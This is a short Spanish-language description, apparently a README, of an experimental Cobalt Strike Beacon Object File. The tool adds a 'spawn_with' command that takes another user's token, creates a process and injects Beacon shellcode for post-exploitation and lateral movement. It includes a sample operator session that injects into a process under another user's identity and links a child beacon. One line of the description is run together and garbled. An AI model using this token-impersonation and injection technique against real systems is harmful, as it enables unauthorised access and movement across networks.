
BOF de Cobalt Strike que crea un proceso utilizando el token de otro usuario e inyecta shellcode de Beacon, lo que permite post-explotación y movimiento lateral mediante suplantación de identidad.
Un Beacon Object File (BOF) experimental que ofrece una alternativa a los comandos spawnas e inject. Este expone un nuevo comando, spawn_with [pid] [listener], que realiza lo siguiente:
spawnto del Beacon.CreateProcessWithTokenW.
CreateProcessAsUserW.beacon> getuid
[*] You are DESKTOP-1U6AHIU\Daniel (admin)
beacon> ps
22656 21972 wordpad.exe x64 1 DESKTOP-1U6AHIU\test_user
beacon> spawnto x64 %windir%\sysnative\notepad.exe
beacon> spawn_with 22656 tcp-local
[*] Task Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444)
[+] received output:
Spawned PID 45668 and injected 297472 bytes
[+] established link to child beacon: 192.168.0.195
